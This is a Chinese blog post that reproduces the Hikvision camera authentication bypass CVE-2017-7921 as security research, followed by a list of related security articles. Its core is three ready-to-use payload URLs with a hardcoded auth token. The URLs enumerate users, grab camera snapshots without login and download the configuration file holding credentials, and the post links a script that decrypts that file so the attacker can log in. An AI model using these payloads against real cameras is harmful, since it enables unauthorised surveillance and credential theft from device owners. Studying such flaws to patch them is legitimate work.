海康威视未授权访问漏洞 (CVE-2017-7921)复现研究

前言:本文内容仅供学习参考及处置建议,文章内容不涉及任何以破坏为目的的犯罪行为,敏感信息已经过脱敏处理,请勿将本文内容用于违法犯罪活动!

一、发现摄像头

(略)

二、构造payload测试

以下是可能存在漏洞的登录页面样式,经供参考。

复制代码
1.http://[摄像头IP]/Security/users?auth=YWRtaW46MTEK 获取用户 
2.http://[摄像头IP]/onvif-http/snapshot?auth=YWRtaW46MTEK 拍摄快照而不进行身份验证 
3.http://[摄像头IP]/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件(该文件包含用户名密码等关键信息)

构造第一条语句,看到用户admin:

构造第二条语句,拍摄快照:

构造第三条语句,下载配置文件;

三、解密配置文件获取用户名密码

拿到用户名密码,登录成功。

解密脚本地址:

https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

声明:本文档仅供安全研究与学习交流使用,切勿用于非法渗透测试或未授权攻击。

相关推荐
Chockmans16 分钟前
春秋云境CVE-2017-3506
安全·web安全·网络安全·系统安全·安全威胁分析·春秋云境·cve-2017-3506
开开心心就好23 分钟前
近200个工具的电脑故障修复合集
安全·智能手机·pdf·电脑·consul·memcache·1024程序员节
一拳一个娘娘腔44 分钟前
精通Metasploit Framework:网络安全攻防实战与全链路渗透解析
安全
一切皆是因缘际会1 小时前
下一代 AI 架构:基于记忆演化与单向投影的安全智能系统
大数据·人工智能·深度学习·算法·安全·架构
龙亘川2 小时前
具身智能机器人安全深度解析:从风险现状到防护实践(2026)
安全·机器人·具身智能安全技术白皮书
Ww.xh2 小时前
ClaudeCode安全注入Figma Token最佳实践
安全·figma
杜哥无敌2 小时前
从FTP到SFTP:企业文件传输安全演进、技术内幕与迁移指南深度解析
安全
KnowSafe2 小时前
CLM最佳实践:构建高效证书生命周期管理体系
安全·https·clm·itrustssl·trustasia
开开心心_Every2 小时前
轻量级PDF阅读器,仅几M大小打开秒开
linux·运维·服务器·安全·macos·pdf·phpstorm
Chengbei112 小时前
轻量化 Web 安全日志分析神器 星川智盾日志威胁检测、地理溯源、MITRE ATT&CK 映射,支持 Windows/macOS/Linux
前端·人工智能·安全·web安全·macos·系统安全·安全架构